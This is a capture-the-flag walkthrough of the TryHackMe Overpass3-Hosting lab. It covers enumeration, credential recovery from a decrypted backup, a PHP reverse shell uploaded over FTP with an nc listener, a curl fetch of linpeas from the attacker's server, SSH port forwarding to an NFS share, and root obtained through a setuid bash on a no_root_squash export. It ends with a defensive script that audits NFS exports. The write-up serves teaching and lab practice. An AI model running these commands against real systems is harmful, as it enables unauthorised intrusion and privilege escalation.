Link to room on TryHackMe.com

Welcome to my TryHackMe Overpass3-Hosting write-up! First we start enumeration with rustscan, using this command:

rustscan -a 10.10.70.140 -- -sC -sV

We see three ports are open and there is no useful exploit for these versions of the services, so we keep enumerating with gobuster using this command:

gobuster dir -u http://10.10.70.140/ -w common.txt -x php,html,md,js,txt

We see there is a directory called /backups. When we check it we find a file called backup.zip, and inside it there is a private key and an encrypted file.


To decrypt the file we use these commands:

unzip backup.zip
gpg --import priv.key
gpg --output CustomerDetails.xlsx --decrypt CustomerDetails.xlsx.gpg

After that, in the decrypted file we find some credentials:


When we try to log in to FTP with the user paradox, we see we can log in and upload files. With this weakness we can get a reverse shell; you can find a PHP reverse shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . So first we upload our .php file, then we start a listener on our attack box with this command:

nc -lvnp 443

When we visit /shell1.php in the browser we get a reverse shell:


We see we are in as user apache. After that we log in as user paradox. To get some information about the system we upload linpeas.sh to the target; you can find it here: https://github.com/peass-ng/PEASS-ng/releases/download/20240421-825f642d/linpeas.sh . To upload this script, first we start a simple HTTP server on our attack box with this command:

python3 -m http.server 7000

After that, on the target we use these commands:

cd /dev/shm
curl http://10.17.52.17:7000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

So linpeas says there is an NFS share. After some research I found out that the NFS share is only accessible locally and that we need an SSH key to reach it. First we generate an SSH key pair, then paste the public key into /home/paradox/.ssh/authorized_keys.


After that we run these commands on our attacker box for port forwarding:

chmod 600 sshkey
ssh -L 2049:localhost:2049 paradox@10.10.70.140 -i sshkey

After that we mount the share with these commands:

mkdir nfs
mount -t nfs 127.0.0.1: nfs

And then we see there is the second flag and the private key of james.


Then we see the private key has no passphrase and we can log in as user james.


To find our first flag we use this command:

find / -type f -name "*flag*" -exec ls -l {} + 2>/dev/null

To become root we use the NFS misconfiguration. First, on the target we use this command:

cp /usr/bin/bash /home/james

After that, on our attack box we go to the mounted directory and use these commands:

chown root:root bash
chmod +s bash

Then, when we look at the bash binary on the target, it should look like this before we execute it:


And finally we use this command to become root:

./bash -p
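The misconfiguration this step relies on is an NFS export with the no_root_squash option: root on a client is not remapped to the anonymous user, so a root-owned setuid binary left on the share runs with root privileges on the server. As an added example written from the defender's side (not part of this write-up or the room), the following Python script parses an /etc/exports file and flags such exports; the sample file contents are constructed.

```python
import re
from typing import List, NamedTuple

class Export(NamedTuple):
    path: str
    client: str
    options: List[str]

class Finding(NamedTuple):
    path: str
    client: str
    reason: str

# Constructed sample /etc/exports for this example (not the target's real file).
SAMPLE_EXPORTS = """\
# local backups, read-only, root squashed (the default)
/srv/share   192.168.1.0/24(ro,sync,root_squash)
/srv/homes   *(rw,sync,no_root_squash,no_subtree_check)
/export/data 10.0.0.5(rw,sync) \\
             10.0.0.6(rw,no_root_squash)
"""

def parse_exports(text: str) -> List[Export]:
    """Parse exports(5) syntax: 'path client(opts) client(opts) ...'.
    Handles comments, blank lines and backslash line continuations."""
    exports: List[Export] = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:  # no client at all means everyone
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            exports.append(Export(path, client, opts))
    return exports

def audit_exports(text: str) -> List[Finding]:
    """Flag exports where root is not squashed, plus wildcard clients."""
    findings: List[Finding] = []
    for e in parse_exports(text):
        # root_squash is the default; only an explicit no_root_squash disables it
        if "no_root_squash" in e.options:
            mode = "rw" if "rw" in e.options else "ro"
            findings.append(Finding(e.path, e.client, f"no_root_squash ({mode})"))
        if e.client == "*":
            findings.append(Finding(e.path, e.client, "exported to any host"))
    return findings
```

Run audit_exports on the contents of a server's /etc/exports, or compare against exportfs -v, which prints the effective options including defaults.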

And done, we are root. Thanks for reading!